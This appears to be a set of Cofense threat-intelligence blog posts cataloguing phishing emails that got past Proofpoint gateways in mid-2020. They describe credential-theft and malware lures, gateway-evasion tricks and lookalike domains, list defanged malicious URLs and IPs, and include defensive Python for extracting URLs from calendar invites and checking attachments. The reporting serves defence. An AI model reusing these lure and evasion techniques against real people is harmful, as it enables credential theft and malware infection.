Phish Found in Proofpoint-Protected Environments – Week Ending July 26, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) were found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and were automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. Reply chain attacks are of particular note this week, as attackers use existing email discussions to lend a sense of legitimacy to their phish. Cofense saw these Zombie Phish last year and they continue to find success.

phishing example of a voicemail theme credential theft

TYPE: Credential Theft

DESCRIPTION: Here’s a voicemail-themed attack that includes a partial transcript – just enough to lure the recipient into clicking. Doing so leads to a Google Forms page that captures and exfiltrates login credentials. Voicemail spoofs aren’t new; Cofense has been blogging about them for some time.

example phish spoofing tax forms for credential theft

TYPE: Credential Theft

DESCRIPTION: With due dates for taxes extended thanks to the COVID-19 situation, tax-themed phish are still effective. Posing as a Human Resources representative, this phish uses Infogram URLs to capture email login credentials.

phishing example of a reply chain attack using emotet to download qakbot

TYPE: Malware – QakBot

DESCRIPTION: Over a year ago, Cofense wrote about Emotet and its use of compromised emails to perform reply-chain attacks. This example uses an attached PDF with links to a macro-laden Microsoft Office document to deliver first Emotet and then QakBot.

phishing sample poses as an invoice but links to the pyrogenic stealer malware

TYPE: Malware – Pyrogenic

DESCRIPTION: Another example of reply-chain tactics to trick a recipient into following the embedded links to the Pyrogenic Stealer malware. This one uses a finance theme spoofing an Accounts Payable department.

sample phish uses an image link to deliver agent tesla malware

TYPE: Malware – Agent Tesla

DESCRIPTION: No one wants to miss a sale, and the attackers know it. They use a quotation theme to lure the recipient into clicking the image link to download the Agent Tesla keylogger, a piece of malware we covered last year.

phishing example of a quarantine theme credential theft

TYPE: Credential Theft

DESCRIPTION: Knowing users are becoming better trained to detect phishing attempts and to rely on existing security mechanisms, the attackers behind this phish spoof an email quarantine service to encourage the recipient to click and give up their credentials. Can your users tell the difference between your organization’s quarantine and a fake?

phish sample uses covid-19 pandemic theme to perform credential theft

TYPE: Credential Theft

DESCRIPTION: This last example for the week spoofs the Human Resources department using a Coronavirus theme to encourage the recipient to click the link and give up their credentials. Cofense put together a Coronavirus InfoCenter with numerous resources to help educate your organization on these threats.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending July 19, 2020


Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. Phishing threat actors continue to rely on tried-and-true methods to get their attacks into user inboxes. We discussed the latest trends recently on our Phish Fryday podcast.

example phish delivers LolKek ransomware with an xlsb attachment

TYPE: Malware – LolKek

DESCRIPTION: This phish uses an order theme spoofing Salesforce.com to deliver a Microsoft Excel Binary attachment (.xlsb). Within this file, macros are designed to download and install a recently discovered form of ransomware called LolKek. Excel Binary documents aren’t as common in general usage, but come in handy when working with large files. Or malicious attachments.

sample phish delivers Remcos remote access trojan via image link

TYPE: Malware – Remcos

DESCRIPTION: This contract-themed phish delivers an image link designed to look like an attached Microsoft Office document. Instead, it downloads a document crafted to exploit CVE-2017-11882 and fetch a VBS script, which in turn downloads a PowerShell script. That script then unpacks and loads a DotNET Loader that runs the Remcos Remote Access Trojan. That’s a long way of saying system compromise.

phishing example spoofs world health organization to deliver credential theft link

TYPE: Credential Theft

DESCRIPTION: Taking advantage of the current pandemic, this phish spoofs the World Health Organization to convince the recipient to click the link. Doing so prompts for credentials including “Gmail, Office, Yahoo, AOL, Outlook, and ‘other’” and then directs to a Google Drive-hosted PDF. Despite the official-looking sender and logo, the body is rife with grammatical errors.

phishing example performs credential theft via image link

TYPE: Credential Theft

DESCRIPTION: Claiming to provide an attached statement, this phish uses a linked URL masquerading as a PDF attachment to direct the recipient to a Microsoft SharePoint-hosted page designed to steal credentials. Cofense continues to cover the use of trusted cloud services for untrustworthy purposes.

phishing sample delivers dridex malware via zipped attached word document

TYPE: Malware – Dridex

DESCRIPTION: This invoice-themed phishing attack promises a booking invoice but delivers a macro-enabled Microsoft Word document inside a ZIP archive. Those macros lead to the installation of the Dridex malware.

phish example spoofs HR to deliver credential theft via embedded link to sharepoint

TYPE: Credential Theft

DESCRIPTION: Still getting used to remote work? Attackers hope so, attempting to trick recipients into following their trusted Microsoft SharePoint links to a nasty end. In this case, a credential harvesting page. Cofense has put together a number of tips to help you defend your remote workers.

example phish with fax theme delivers credential theft with an htm attachment

TYPE: Credential Theft

DESCRIPTION: Just the fax, ma’am. This fax-themed phish encourages the recipient to open the attached .htm file. The file is designed to look like a Microsoft login page. The attacker is hoping to capture the login credentials of the recipient.

example phish that delivers an embedded URL for credential theft

TYPE: Credential Theft

DESCRIPTION: The Coronavirus theme is still getting some mileage among attackers. This one includes an embedded URL that will try and steal credentials for “Outlook, Office365, Gmail, Yahoo, and ‘other’” services. After providing credentials, the recipient is sent to a legitimate-looking PDF in an attempt to reduce suspicion.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.


Invoice Themed Phishing Emails Are Spreading from Trusted Links

By: Kian Mahdavi, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) is seeing continued growth in phishing attacks that harvest users’ credentials via genuine file-sharing websites, attacks found in environments protected by Proofpoint’s Secure Email Gateway (SEG). A major factor in this campaign is the confidence users place in emails containing a “trusted” Dropbox reference.

It is tricky for SEGs to keep up with attempts to spread phishing attacks and malware via sharing services such as Dropbox, ShareFile, WeTransfer, Google Docs, Egnyte and even SharePoint. Fortunately, a few of our clients’ users reported the phishing emails via the Cofense Reporter button.

The “traditional” methodology for attackers was to “break in.” Nowadays, thanks to sharing sites, they can simply “log in.”

Figure 1 – Body of email showcasing the victory of this attack tying in with user interaction

The spear phishing attack sends a link inviting users to access a purchase order form with a (.pdf) extension. Clicking it opens the user’s default web browser and prompts them to click the “Download” button, after which the file is saved to the “Downloads” folder. Nothing sinister going on, right?

The sender address’s domain – “actionsportsequipment[.]com” – coincidentally relates to the nature of the client’s industry, which shows the lengths the attackers went to in a bid to slip through the “secure” environment. Recipients should ask themselves: “Was I expecting this transfer?” and “Am I expecting to receive a purchase order from this sender?”

Moreover, since the emails are sent and authenticated by Dropbox’s own servers, they pass basic email authentication checks such as DKIM and SPF.

Figure 2 & 3 – Downloadable purchase order file

Once the download completes, the user is prompted to open the (.html) file, expecting the “purchase order” form to appear. Instead, the campaign redirects the user to a supposed “Microsoft” login page.

In this case, the attackers used the free website builder “Weebly.com”, yet another legitimate source. This further deceives the security measures in place: trusted redirect domains and IPs will naturally continue to be whitelisted and deemed “safe,” since millions of users share data with one another on a daily basis.

For this reason the padlock appears too, providing not only transport security between both parties but also the illusion that the website itself is “secure.”

Figure 5 – Phishing site built by Weebly

Once credentials have been supplied, the campaign redirects the user to the authentic ‘office[.]com’ webpage, which could even be enough to assure users it was a genuine procedure. A user’s personal data could potentially be in the hands of the threat actor, assuming they logged in with their true Microsoft credentials.

Figure 6 – Redirect to Microsoft Office webpage  

Indicators of Compromise:

Network IOCs:
hXXps://www[.]dropbox[.]com/l/AADOPQGXtuDK03QYuvJqI0MbDlDxBTV28Cs
hXXps://www[.]dropbox[.]com/l/AAAtWq-LVZcqXBnFLinUi9rB3LpEijuPo78
hXXps://helpsupport0ffice20[.]weebly[.]com/

IPs:
162[.]125[.]6[.]1
199[.]34[.]228[.]53
199[.]34[.]228[.]54

LEARN MORE about the Cofense Phishing Defense Center. See how the PDC’s managed phishing response and remediation stops the phishing attacks that elude email gateways.


Phish Found in Proofpoint-Protected Environments – Week Ending July 12, 2020


Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. This week’s theme is financial – with a large number of invoice and purchase order lures designed to trick recipients into clicking links and attachments. We’ve documented these attack types for some time now.

TYPE: Credential Theft

DESCRIPTION: Mail storage-themed phish have been used for some time to frighten recipients into clicking the link so their email account isn’t suspended. This attack, in Chinese, directs the recipient to a credential harvesting page customized with the recipient’s email domain name, lending a sense of veracity to the site.

TYPE: Credential Theft

DESCRIPTION: This finance-themed attack uses the ever-popular Microsoft OneDrive to host a malicious OneNote document that steals Office365 credentials before redirecting the recipient to a real Microsoft page, delaying the recognition that they were just targeted.

TYPE: Credential Theft

DESCRIPTION: Keeping with the finance theme, this attack delivers an embedded URL that leads to a credential harvesting page. Proof that if the lure looks good, the recipient can be tricked into clicking.

TYPE: Credential Theft

DESCRIPTION: This is getting repetitive, but another finance-themed attack spoofing a popular brand to convince the recipient to click. This attack targets banking credentials, potentially giving the attackers access to the bank account of the recipient.

TYPE: Malware – Pyrogenic

DESCRIPTION: Last week’s attackers really had money on their minds. This invoice-themed attack uses image links pretending to be invoices to drive the recipient to download the Pyrogenic stealer malware.

TYPE: Malware – Agent Tesla

DESCRIPTION: This attack uses a purchase order theme to deliver an attached .html file that will direct the recipient to download the Agent Tesla malware. We discussed this malware earlier this year on our Phish Fryday podcast.

TYPE: Malware – Dridex

DESCRIPTION: Another invoice, another piece of malware. This time the attacker uses a macro-enabled Microsoft Excel file to deliver the Dridex malware. Are you sure you want to enable macros?

TYPE: Malware – Ursnif

DESCRIPTION: This Italian invoice-themed attack forces the victim through a few steps, which were designed with SEG evasion in mind. A password-protected .zip file is delivered, with the password provided, which contains a macro-enabled Microsoft Office document. From there, the Ursnif malware is downloaded and deployed. Arrivederci, baby.

TYPE: Malware – ZLoader

DESCRIPTION: A simple invoice. A simple .xls attachment. A complex attack that uses Microsoft Excel macros and a VBS downloader to install ZLoader on the recipient’s machine. We blogged about this tactic a few weeks ago.

TYPE: Malware – Agent Tesla

DESCRIPTION: Agent Tesla continues to be a popular threat delivered via phishing emails. This attack uses a purchase order theme to entice the recipient into clicking the embedded link to download this malicious keylogger extraordinaire.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.


Phish Found in Proofpoint-Protected Environments – Week Ending July 5, 2020


Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. The majority of this week’s examples are Credential Theft, an attack type we’ve been watching grow for some time. While not a panacea, many companies are rolling out MFA solutions to reduce the risk from compromised accounts.

TYPE: Credential Theft

DESCRIPTION: This notification-themed phish spoofs a European provider of credit and payment cards to trick victims into turning over their credentials.

TYPE: Credential Theft

DESCRIPTION: This notification-themed email delivers a .htm file pretending to be a short voice message. Instead, it spoofs Microsoft URLs with the intent to harvest login credentials.

TYPE: Malware – Mass Logger

DESCRIPTION: This finance-themed attack delivers OneDrive URLs to the unsuspecting victim, leading them to download the Mass Logger malware. This malware was recently analyzed by Cofense and noted for its capabilities as well as its frequent update cycle.

TYPE: Credential Theft

DESCRIPTION: Here’s a finance-themed phishing attack that delivers attached .html files. These files spoof a well-known brand to capture corporate credentials.

TYPE: Credential Theft

DESCRIPTION: They say sharing is caring, but not when it’s a phishing attack masquerading as a Coronavirus document. This attack uses SharePoint URLs to host credential-stealing pages. Cofense has been tracking COVID-19 scams since the beginning.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.


Phish Found in Proofpoint-Protected Environments – Week Ending June 28, 2020


Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. Of note is the use of macro-enabled documents using Microsoft Office document extensions dating to versions sold prior to 2007. Organizations may want to consider ways to identify and filter these files.

TYPE: Malware – Dridex

DESCRIPTION: Macro-enabled Excel documents and Dridex malware – name a more iconic pair. This phishing attack used Microsoft Excel documents to deliver Dridex to the inbox. Just like we’ve been blogging about since 2017.

TYPE: Malware – ZLoader

DESCRIPTION: Who uses XLS files anymore? Well, attackers for one. This attack uses the long outdated file type to execute macros that download ZLoader via a VBS chain. Cofense Triage customers have been detecting and remediating attacks delivering ZLoader since 2017.

TYPE: Credential Theft

DESCRIPTION: This phish leverages a trusted cloud storage service to capture login credentials from the Danish-speaking victim. This should come as no surprise, as Cofense has been seeing the use of trusted cloud services for years.

TYPE: Malware – NetWire

DESCRIPTION: Microsoft’s Office Equation Editor vulnerability (CVE-2017-11882) has been a favorite for attackers. Discovered in 2017, it is exploited through malicious documents delivered as attachments or, as in this case, via an embedded URL to compromise victims. This example delivers the NetWire Remote Access Trojan.

TYPE: Malware – ZLoader

DESCRIPTION: Another attack using the old XLS format with macros to deliver ZLoader. This one uses an invoice theme to trick its victims into opening the attachment.

TYPE: Malware – Agent Tesla

DESCRIPTION: This invoice-themed phish includes an embedded URL to download a .7z archive. Inside the archive is the ever-popular Agent Tesla, a top threat as recently as last year.

TYPE: Credential Theft

DESCRIPTION: While we saw plenty of malware in this week’s batch, the old standard of credential phish is still around. This profile-themed phish spoofs a state agency to capture credentials that are exfiltrated using Google forms.

TYPE: Malware – Hive

DESCRIPTION: This purchase order-themed phish delivers an embedded URL to the FireBird Remote Access Trojan variant known as Hive.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.


“You’re Invited!” to Phishing Links Inside .ics Calendar Attachments

By Ashley Tran, Cofense Phishing Defense Center

Every day threat actors find more and more ingenious ways to deliver phishing emails to end users. From direct attachments to using third-party document hosting sites and… calendar invitations? The Cofense Phishing Defense Center (PDC) has unearthed a new phishing campaign in multiple enterprise email environments protected by Proofpoint and Microsoft that delivers .ics calendar invite attachments containing phishing links in the body. It’s assumed that the attackers believe stuffing the URL inside a calendar invite would help avoid automated analysis.

Figure 1: Email Body

The subject of this phish is “Fraud Detection from Message Center,” reeling in curious users. The sender display name is Walker, but the email address appears to be legitimate, possibly indicating a compromised account belonging to a school district. Cofense observed several compromised accounts being used to send this campaign. Using a compromised real account originating from Office 365 allows the email to bypass email filters that rely on DKIM/SPF.

The story in this phish is a version of a classic lure “suspicious activity on the user’s bank account.” This attachment, however, doesn’t jibe with the ruse considering it’s a calendar invite. A more fitting lure would have been something like “I attached a meeting invite; can you please attend?” Maybe this attacker flunked out of Internet bad guy school.

Figure 2 shows what the calendar invite looks like when opened. Note that it’s hosted on the legitimate Sharepoint.com site, an issue that continues to be problematic for Microsoft.

Figure 2: Calendar invite (.ics) Attachment
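The .ics route works because the phishing URL sits inside the invite’s text properties rather than in the email body. The following is an added example, not Cofense’s or the campaign’s code, of pulling URLs out of a calendar attachment for triage: it unfolds RFC 5545 continuation lines and undoes TEXT escaping, both of which would otherwise break a naive regex. The sample invite, its hostnames (.invalid placeholders) and its paths are constructed.

```python
# Added example: pull URLs out of a .ics calendar attachment. Not Cofense's code.
import re
from typing import Dict, List

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
TRAILING_PUNCT = ".,;:!?)]}'\""


def unfold(ics_text: str) -> List[str]:
    """Undo RFC 5545 line folding: a line starting with one space or tab
    continues the previous content line (the CRLF and that one character go)."""
    lines: List[str] = []
    for raw in ics_text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        elif raw:
            lines.append(raw)
    return lines


def unescape_text(value: str) -> str:
    """Undo RFC 5545 TEXT escaping: \\n -> newline; \\, \\; \\\\ -> the literal char."""
    return re.sub(r"\\([\\;,nN])",
                  lambda m: "\n" if m.group(1) in "nN" else m.group(1), value)


def extract_urls(ics_text: str) -> Dict[str, List[str]]:
    """Map each property name (DESCRIPTION, LOCATION, ATTACH, ...) to the URLs it holds."""
    found: Dict[str, List[str]] = {}
    for line in unfold(ics_text):
        head, sep, value = line.partition(":")   # first ':' ends the property name
        if not sep:
            continue
        name = head.split(";", 1)[0].upper()     # drop parameters such as ;VALUE=URI
        for match in URL_RE.findall(unescape_text(value)):
            found.setdefault(name, []).append(match.rstrip(TRAILING_PUNCT))
    return found


def all_urls(ics_text: str) -> List[str]:
    """Every URL in the invite, de-duplicated, in order of appearance."""
    seen: List[str] = []
    for urls in extract_urls(ics_text).values():
        seen.extend(u for u in urls if u not in seen)
    return seen


# Constructed invite in the shape described above; hosts are .invalid placeholders.
# The DESCRIPTION is folded across three lines and contains an escaped comma.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "PRODID:-//Constructed//Example//EN\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:constructed-0001@example.invalid\r\n"
    "DTSTART:20200615T140000Z\r\n"
    "SUMMARY:Fraud Detection from Message Center\r\n"
    "DESCRIPTION:Suspicious activity was detected on your account.\\nReview it \r\n"
    " here: https://tenant-my.sharepoint.invalid/:b:/g/personal/admin/doc\\, \r\n"
    " then confirm at https://storage.example.invalid/bucket-0000/index.html\r\n"
    "LOCATION:https://lookup.example.invalid/meeting\r\n"
    "ATTACH;VALUE=URI:https://cdn.example.invalid/logo.png\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)
```

Feeding the extracted URLs to the same reputation and sandbox checks applied to links in the message body closes the gap the attackers were counting on.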

Upon clicking the link in the fake invitation, a relatively simple document opens with yet another link to follow, as seen in Figure 3 below:

Figure 3: Phishing Page

If the victim follows that link, they are redirected from sharepoint.com to a phishing site hosted by Google. Clicking anywhere on the document then redirects users to a bogus phishing page seen in Figure 4.

Figure 4: Phishing Page

As shown in Figure 4, the final phishing page users are directed to is hosted on:

hXXps://storage[.]googleapis[.]com/awells-putlogs-308643420/index[.]html

This is not the first time threat actors have utilized “storage[.]googleapis[.]com” to host their phish. In fact, it is becoming increasingly common thanks to its ease of use as well as the built-in SSL certificate the domain comes with, which adds the “trusty” padlock to the side of its URL.

Once redirected here from the previous SharePoint page, users are presented with a convincing Wells Fargo banking page, as seen in Figure 4. This page asks for a variety of Wells Fargo account information including login details, PIN and various account numbers along with email credentials. At surface value, it may seem excessive to request this level of information, but under the pretense of “securing” one’s account, it may not appear to be so much.

Should users provide all the requested information, they will finally be redirected to the legitimate Wells Fargo login page to make the user believe they have successfully secured their account and nothing malicious has taken place.

And to think, all of this from a simple calendar invite. It goes to show, users and their security teams must constantly maintain phishing awareness training and remain vigilant as threat actors continue to find new ways to slip past gateways right into inboxes.

Network IOCs:
hXXps://mko37372112-my[.]sharepoint[.]com/:b:/g/personal/admin_mko37372112_onmicrosoft_com/ERto2NKXu6NKm1rXAVz0DcMB431N0n1QoqmcqDRXnfKocA
hXXps://storage[.]googleapis[.]com/awells-putlogs-308643420/index[.]html

IPs:
172[.]217[.]13[.]240
13[.]107[.]136[.]9

Phish Found in Proofpoint-Protected Environments – Week Ending June 21, 2020


Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. We are not alone in dealing with attachment issues. This week’s batch of phish contain quite a few bearing common attachments to deliver malware and steal credentials. If only there were a better way to defend ourselves.

TYPE: Malware – NanoCore

DESCRIPTION: This purchase order-themed phish delivered a .zipx attachment that was actually a RAR archive, a mismatch that a gateway keying on the file extension rather than the file’s magic bytes will not notice. The attackers were kind enough to tell the recipient which software to use to open it and so reach the NanoCore Remote Access Trojan inside. NanoCore resurfaced in early 2018 and still reaches inboxes.

TYPE: Malware – Dridex

DESCRIPTION: A finance-themed phish uses a macro-enabled Microsoft Excel attachment to deliver the Dridex malware. Cofense was reporting on this malware back in 2015 and it still finds success despite the latest advances in perimeter technologies.

TYPE: Malware – Agent Tesla

DESCRIPTION: This delivery-themed phish targets organizations in Thailand and promises shipping information at the embedded link. The victim instead ends up with a case of Agent Tesla, a keylogger (and more) that we discussed in a recent Phish Fryday podcast.

TYPE: Malware – Remcos

DESCRIPTION: This document-themed phish includes a Microsoft Word attachment that leverages a pair of Microsoft Office vulnerabilities, CVE-2017-0199 (remote code execution through a malicious OLE object that hands off to the HTA handler) and CVE-2017-11882 (a stack buffer overflow in the legacy Equation Editor, EQNEDT32.EXE), to download a DotNETLoader that installs the Remcos Remote Access Trojan. Both were patched in 2017, and Cofense has tracked their exploitation since then.

TYPE: Malware – Dridex

DESCRIPTION: Pretending to be an international logistics company with some shipment information, the attached .zip file contains a macro-enabled Microsoft Office document that displays a fake invoice while silently installing the Dridex malware.

TYPE: Malware – Ursnif

DESCRIPTION: Attackers love to leverage legitimate cloud services to make their phish more successful. This response-themed attack makes use of Firefox Send to deliver a password-protected archive containing VBScripts that will download and run the Ursnif malware.

TYPE: Malware – TrickBot

DESCRIPTION: Spoofing a state government office, this phish delivers macro-laden Microsoft Office documents via an embedded link to a SharePoint site requiring a password for access. The victim will download the TrickBot malware.

TYPE: Credential Theft

DESCRIPTION: Attackers haven’t forgotten about the Coronavirus and continue to leverage the theme to get recipients to engage. This attack delivers an HTML attachment that spoofs Adobe to steal credentials.

TYPE: Credential Theft

DESCRIPTION: Another document-themed attack delivering a web page (.htm). This one spoofs a Microsoft login page to harvest credentials.
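The .zipx-that-is-really-RAR sample and the macro-laden Office attachments in this week’s list come down to two cheap checks a mail pipeline can make on attachment bytes: does the container’s magic match its extension, and does an OOXML document carry a vbaProject.bin part. The following is an added example, not code from the Cofense post. The signature table, the extension allowlist and the constructed fixtures (a bare RAR5 signature, a minimal OOXML-shaped zip) are assumptions made for illustration, not real samples.

```python
import io
import zipfile

# Magic bytes for the container formats seen in this week's samples.
# OOXML documents (.docx/.docm/.xlsm ...) are zip containers; legacy .doc/.xls/.pub are OLE compound files.
MAGIC = (
    (b"Rar!\x1a\x07\x01\x00", "rar5"),
    (b"Rar!\x1a\x07\x00", "rar4"),
    (b"PK\x03\x04", "zip"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),
)

# Which sniffed container each extension may legitimately have (assumption: extend for your own policy).
EXPECTED = {
    "zip": {"zip"}, "zipx": {"zip"}, "rar": {"rar4", "rar5"},
    "docx": {"zip"}, "docm": {"zip"}, "xlsx": {"zip"}, "xlsm": {"zip"},
    "doc": {"ole"}, "xls": {"ole"}, "pub": {"ole"},
}


def sniff(data: bytes) -> str:
    """Identify the container by its leading bytes, ignoring whatever the filename claims."""
    for signature, kind in MAGIC:
        if data.startswith(signature):
            return kind
    return "unknown"


def has_vba_project(data: bytes) -> bool:
    """OOXML stores VBA in a vbaProject.bin part; its presence is the cheapest macro indicator.
    Legacy OLE files keep VBA in streams and need an OLE parser (e.g. oletools' olevba) instead,
    so this deliberately returns False for anything that is not a zip container."""
    if sniff(data) != "zip":
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(name.lower().endswith("vbaproject.bin") for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def assess_attachment(filename: str, data: bytes) -> dict:
    """Combine the extension/magic mismatch check with the macro check into one verdict."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = sniff(data)
    mismatch = ext in EXPECTED and kind not in EXPECTED[ext]
    macros = has_vba_project(data)
    return {
        "filename": filename,
        "extension": ext,
        "kind": kind,
        "mismatch": mismatch,
        "macros": macros,
        "suspicious": mismatch or macros,
    }


# Constructed fixtures (not real samples): a RAR5 signature with padding, and a minimal OOXML-shaped zip.
RAR5_STUB = b"Rar!\x1a\x07\x01\x00" + b"\x00" * 8


def build_ooxml(with_macros: bool) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            # Real vbaProject.bin parts are OLE files; only the header matters for this check.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in (("PO-0617.zipx", RAR5_STUB),
                       ("invoice.docm", build_ooxml(True)),
                       ("notes.docx", build_ooxml(False))):
        print(assess_attachment(name, blob))
```

A .zipx that sniffs as rar5 is flagged before anything is extracted, and a zip-based document is flagged on the mere presence of the VBA part, regardless of whether the extension is .docx or .docm. Legacy binary formats are reported as "ole" and left to a dedicated OLE parser.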

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


Practice Makes Perfect

By Noah Mizell and Kyle Duncan, Cofense Phishing Defense Center

The Phishing Defense Center (PDC) has discovered two distinct phishing campaigns found in environments protected by Proofpoint that spoof Twitter by using registered fraudulent domains.

Some threat actors vary their attacks over the course of a campaign; others stick with tried-and-true techniques that have proven effective. The latter is the case here. The two attacks share the same tactics (registered fraudulent domains, specifically tailored sender addresses, and nearly identical phishing emails and pages), which points to a single campaign.

Figures 1-2: First Iteration of Attack

The subject of the phishing email is “Security alert: new or unusual login” and the sender is “verify[@]tlwtttierz[.]com”. Although the domain is obviously not Twitter.com, it is close enough to the real name that a user reacting to the urgent tone may overlook it. Users must be careful when reacting in haste, as threat actors seek to turn quick thinking against targets to steal their credentials.

The body of the email looks like a legitimate Twitter notification. Similar font type, layout, the familiar Twitter logo showing – nothing appears to be amiss. Reading the contents of the message though, users may be surprised to see there has been a new login from a new device from Spain! Supposing the user is not connected to this location, this is likely to be cause for concern. But worry not, “Twitter” has sent a handy link to secure the account in question.

Hovering over the “Secure my account” link reveals its actual target:

twltt%C4%99r[.]com

Once clicked, the browser’s address bar shows a URL that looks like “Twitter.com”:

twlttęr[.]com

For this attack, the threat actor registered an internationalized domain name (IDN) that looks like “Twitter.com”. Domain labels may contain non-ASCII characters, and three spellings of the same name are in play here. The href in the email carries the percent-encoded UTF-8 form, twltt%C4%99r: the two bytes C4 99 are the UTF-8 encoding of U+0119, the Polish letter ę. Once the browser decodes that, the address bar shows twlttęr[.]com, where ę passes for the ‘e’ of the legitimate Twitter.com.

DNS cannot carry ę, so for resolution the label is converted with punycode to its ASCII form, xn--twlttr-04a (the domain appears in that form in the IOC list below). Punycode is the ASCII encoding IDN labels use on the wire; the xn-- prefix marks a label that has been encoded this way. Browsers apply heuristics to decide whether to display the Unicode form or the xn-- form, and an all-Latin label with an ordinary diacritic such as ę generally passes them, which is what makes this lookalike effective. Blocklists and DNS logs should therefore carry the xn-- form, not the display form.

Figure 3-4: Second Iteration of Attack 

Although this second attack may appear to be the same one from Figures 1-2, it is an improvement – the threat actor made minor tweaks to enhance its believability.

The subject of the email has changed: “New login from Safari on iPhone”. Like the previous attack’s subject, this is also meant to evoke a sense of urgency. This time, however, the sender email is not the obviously wrong “verify[@]tlwtttierz[.]com” but rather a more subtle “verify[@]mobiles-twitter[.]com”.

Although this email looks like an exact copy of the last attack, the threat actor added a small yet impactful detail: at the bottom they specifically reference the recipient: “We sent this email to _____”. Most users have been told to look out for generic “Dear sir/ma’am” terms in emails. If the email is not specifically addressed to the recipient, it is likely a mass mailing, perhaps with malicious intent. For most users, personalization adds legitimacy.

As in the first attack, the threat actor included a disclaimer under the hyperlink to “help” users accept that this is a legitimate email from Twitter. Both emails say that a padlock in the browser indicates a secure and legitimate site. The padlock only shows that the site presents a valid TLS certificate, i.e. that traffic between the browser and the web server is encrypted; anyone who controls a domain, including an attacker, can obtain one for it. Contrary to widespread belief, a padlock does not equal safe. The attacker is simply trying to erase any doubts about the site.

The final change of this second attack can be seen when hovering over the “Confirm my identity” hyperlink and finding a new fraudulent domain:

mobiles-twitter[.]com

This domain appears more legitimate than the one from the first attack because it contains the word “twitter”. Since mobile[.]twitter[.]com leads to the legitimate mobile version of Twitter, “mobiles-twitter[.]com” was most likely intended to pass for it.

